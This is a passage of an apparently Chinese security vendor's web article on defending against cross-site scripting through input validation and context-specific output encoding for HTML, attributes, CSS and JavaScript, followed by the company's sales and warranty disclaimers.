border-box; overflow-wrap: break-word !important;">XSS漏洞防御</strong></p></section></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">输入校验:长度限制、值类型是否正确、是否包含特殊字符。其实校验是对数据无害的,满足就放行,不满足就阻止,这样也能保证数据的原生态。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">输出编码:根据输出的位置进行相应的编码,如HTMl编码、Javascript编码、URL编码。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">具体对策</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">6.1</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">进入HTML标签之间时</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">比如,在<span></span>之间,HTML编码转换规则如下:</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">& -->&nbsp; &amp;<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><&nbsp; -->&nbsp; &lt<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 12px;">;</span><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>\>&nbsp; -->&nbsp; &gt;<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>“&nbsp; -->&nbsp; &quot;<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>&#39;&nbsp; -->&nbsp; &#x27<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>/&nbsp; -->&nbsp; &#x2F &nbsp;<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">6.2</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">进入HTML普通属性值时</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">普通属性如 value、width、height等</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><div attr=[输出]>...</div> 无引号包围属性值</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><div attr=”[输出]”>...</div> 有引号包围属性值</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">如果属性值被单引号或是双引号包围了,那只要对单双引号进行HTML编码即可,若 没有引号包围,情况就复杂多了,还得考虑各种浏览器得解析方式,所以强烈建议属性值用引号引起来。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">6.3</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">进入HTML特殊属性值时</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">特殊属性如 href、src、action等</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">进入这种属性时候需要特别注意,一不小心就可能漏掉某条规则,所以这种情况下建议使用白名单的方式来限制属性的行为。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">6.4</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">进入CSS中时</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">CSS非常松散,如果是过滤具体摸个CSS属性值,比如width的值时,尽量避免出现“、’、;、}、{、(、)等特殊字符</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">如果允许用户完整地自定义CSS,则需要过滤掉javascript伪协议、expression、@import等,需要注意的时expression在IE6下对全角字符的处理xua</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">6.5</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">进入Javascript时</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">这种情况最为复杂,最好根据现场环境确定过滤对策,需要注意JS的三种编码方式。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">现实环境</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">现实环境中,很多情况下我们并不需要像上面说的那样一个一个字符去过滤,因为大部分语言框架都已经有相对成熟的XSS防御方案了,只需要调用即可,而且也不推荐自行去实现过滤函数。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">我们只要清楚地知道用户输入到最终的输出整个过程中的每个环节,保证在最终输出的时候是安全的,那么就可以防御住99%以上的XSS攻击了</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">·&nbsp;&nbsp;作为<strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">开发人员</strong>,IT运维人员要有一定的安全意识,当编写一段代码的时候,要站在攻方的角度,来思考程序的安全性。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">·&nbsp; 作为<strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">安全人员</strong>,要站在开发人员的角度来思考,推测开发人员的逻辑,寻找缺陷,并加以利用。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">WAF防火墙|WEB防火墙|WEB防火墙方案|WAF防火墙方案</p></section></p><p><br/></p>

声明:

1、江苏网术科技有限公司所提供产品全部为原厂正规产品,我司不出售翻新机,二手机,等残次品;硬件保修政策及时长按设备原制造厂执行,支持三包规定。

2、价格:官网上列出的价格为含增值税专用发票价格;硬件设备产品含税13%,工程服务含税9%,技术服务含税6%。

3、服务:网站标明的价格为商品本身含税价格,不含其它设定和安装服务;如需要安装设定服务请联系销售人员另行报价。无价格的商品为按需配置的项目商品,需联络销售人员报价。

4、方案:官网所述之方案非完整方案,且并不适用于所有的应用场景,请勿盲目套用。

5、新闻:大多摘自互联网,如有侵权,请与我们联系。

6、运费:苏州,无锡,南通,常州,泰州,镇江,扬州地区免费送货上门,其它地区快递发货。

7、结算:苏州,无锡,南通,常州,泰州,镇江,扬州地区支持账期和月结的结算方式,具体可与销售人员协商。其它地区均为现金结算。

8、其它:服务申明最终解释权归网术科技所有,其它未尽事项请与我们联系。


加载中~